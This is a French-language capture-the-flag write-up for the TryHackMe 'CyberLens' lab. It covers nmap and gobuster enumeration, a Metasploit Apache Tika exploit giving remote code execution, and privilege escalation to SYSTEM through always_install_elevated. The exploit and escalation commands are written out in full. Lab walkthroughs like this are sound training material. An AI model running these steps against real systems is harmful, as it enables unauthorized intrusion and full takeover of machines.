🌸CyberLens

CTF tryhackme

Config

sudo echo '[IP] cyberlens.thm' >> /etc/hosts

Énumération :

nmap -sC -sV -O 10.10.237.189

Ports ouverts :

• Port 80/tcp : Serveur HTTP Apache httpd 2.4.57 (Win64)

• Port 135/tcp : RPC Microsoft Windows

• Port 139/tcp : NetBIOS-SSN Microsoft Windows

• Port 445/tcp : Microsoft-DS

• Port 3389/tcp : Services Microsoft Terminal (RDP)

Analyse du site web : on peut extraire des métadonnées :

Énumération du site web :

gobuster dir -w /urs/share/Wordlist/dirb/common.txt -u http://10.10.237.189

Voici ce qu'on trouve :

Après avoir testé d'extraire les métadonnées, aucune info n'est ressortie.

En cherchant le code source de la page, on voit :

Ce port n'est pas ressorti dans le scan Nmap car ce n'est pas un port habituel. Il aurait fallu faire -p-.

Voici sur quoi il redirige :

Exploitation :

Après quelques recherches, nous identifions un service Apache Tika avec une version vulnérable. Nous utilisons Metasploit pour exploiter cette vulnérabilité et obtenons un accès initial à la machine cible via une session Meterpreter.

msfconsole

Recherche de l'exploit :

search tika

On trouve cet exploit : exploit/windows/http/apache_tika_jp2_jscript

use exploit/windows/http/apache_tika_jp2_jscript
set rhost 10.10.237.189
set rport 61777
run

Récupération du flag utilisateur :

C:\Users\CyberLens\Desktop> type user.txt

Privesc :

Utilisation du module multi/recon/local_exploit_suggester pour identifier les vulnérabilités potentielles pour l’élévation de privilèges.

sessions #La session actuelle est la 3.
use multi/recon/local_exploit_suggester
set session 3
run

On observe 3 vulnérabilités :

On essaie la première :

use exploit/windows/local/always_install_elevated
set session 3
run

Et on est NT AUTHORITY\SYSTEM !

Récupération du flag administrateur

C:\Users\Administrator\Desktop> type admin.txt